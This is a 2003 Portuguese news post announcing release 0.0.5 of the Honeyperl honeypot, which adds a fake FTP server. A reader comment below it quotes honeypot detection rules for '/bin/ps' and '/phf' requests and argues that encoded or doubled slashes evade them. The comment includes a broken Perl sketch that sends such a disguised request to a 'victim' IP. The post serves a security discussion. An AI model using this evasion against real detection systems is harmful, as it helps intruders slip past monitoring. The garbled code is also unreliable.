Notícia publicada por brain em setembro 22, 2003 09:16 AM
| TrackBack
Antonio Marcelo (amarcelo@plebe.com.br) disse: " Temos o prazer de anunciar a nova versão do Honeyperl: 0.0.5. Esta nova release inclui o fakeftp, que simula servidores de FTP, de autoria de Fábio Henrique, o nosso mais novo colaborador. A nova versão incorpora as seguintes novidades : FakeFTP(servidor de FTP falso), novas opções e melhoria no código."
Pode?
Existem tecnicas passiveis de se aproveitar da falta de atençao na configuraçao dos arquivos de regras. Por exemplo notem estas linhas dos arquivos de regras do honeyperl:
/bin/ps=Ataque WEB ! Tentativa de execucao de comando
/phf=Ataque WEB ! Tentativa de exploracao de bug phf
Podemos bem notar que com uma requisiçao ao site do mesmo, procurando por tal arquivo o honeypot detecta a invasao.
Mas e se trocarmos as correspondentes barras pelos seus equivalentes em ASCII ? ou outras inumeras formas de representar barras e mesmo nomes?
Ainda que tal colocar //bin//ps em vez de /bin/ps? Existem servidores que aceitam este tipo de requests.
Voltando a primeira analise podemos facilmente notar que o honeypot é passivel de ser exploitado. Existem inumeros programas (Como firewalls e sistemas de autenticaçao vulneraveis) com este tipo de problema. Veja o caso dos IP's, existem inumeras formas de representa-los e muitos programas nao olham por isso permitindo assim uma facil peleja para os vandalos.
ex:
printf"Critico\n";
printf"Critico\n";
printf"digite o ip: ex : 127.0.0.1\n";
$victima=;
while ($victima=~ /[a-zA-Z]\~\!\@\#\$\%\&\*\(\)\_\+\=/){
printf"digite correctamente";
}
$ataque .="[Outra representacao]bin[Outrarepresentacao]ps";
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victima,
PeerPort => "80") or die "Falha.\n";
printf $socket "GET $victima/$ataque";
printf "\nAguarde enquanto envio...\n";
close $socket;
Comentários desativados: Esta discussão é antiga e foi arquivada, não é mais possível enviar comentários adicionais.